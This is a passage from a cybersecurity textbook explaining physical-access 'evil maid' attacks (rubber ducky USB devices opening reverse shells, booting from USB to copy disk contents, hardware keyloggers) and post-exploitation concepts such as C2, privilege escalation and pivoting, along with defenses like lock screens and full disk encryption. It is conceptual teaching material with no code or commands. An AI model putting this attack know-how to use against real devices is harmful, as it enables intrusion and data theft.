4. The Need for Cybersecurity: Cyber Attacks 81 objectives. The attacker could also try to exploit a vulnerability to escalate his privileges (more on this below). In some evil maid attacks, the attacker has only a short time with the device. This would be the case if the target is using a computer in a public place and then gets up and walks away for a few minutes to get a drink, take a phone call, go to the bathroom, etc. A rubber ducky attack is an attack that uses a special-purpose USB stick to open a command prompt and quickly execute a series of commands by “typing” at computer speeds. The attacker plugs in the device, waits for a short time depending on the commands that are being executed (e.g., ten seconds), and then unplugs it and walks away. In that time, the rubber ducky could create a reverse shell back into the device that the attacker can then use to administer it over the network. This is why it is important for users to activate the lock screen when they step away from their computers. If an attacker gains physical access to a locked device, he could try a password guessing attack. If he is unable to login, the attacker can restart the device and boot to an alternative OS stored on a USB stick. This may allow the attacker to see the contents of the hard drive and copy files and potentially even discover the login credentials to the installed OS. Using full disk encryption would thwart this attack (see Section 9.2.2.1). An evil maid attacker could easily perform a denial attack on the device by damaging it in some way physically or by formatting or encrypting the hard drive. An attacker could also use his unattended access to install an inconspicuous hardware-based keystroke logger on the device as explained above. For all these reasons, maintaining the physical security of computing devices is a vital component of cybersecurity. 4.1.3 Post Exploitation After attackers gain initial access to the target, the post exploitation phase begins. In this phase, many times the attacker gains command and control (C2) access to the victim machine. C2 allows the attacker the ability to remotely issue commands. It usually begins with the victim machine “calling home” and creating a connection back out to the attacker’s machine—this is called a reverse shell. At this point, the attacker may be able to quickly accomplish his actions on objectives (see next section) and move on. But in many attacks, the entry point acts as merely an initial foothold. From there, hackers may attempt to do three things: maintain access, escalate their privileges, and pivot to other computers.
RkJQdWJsaXNoZXIy MTM4ODY=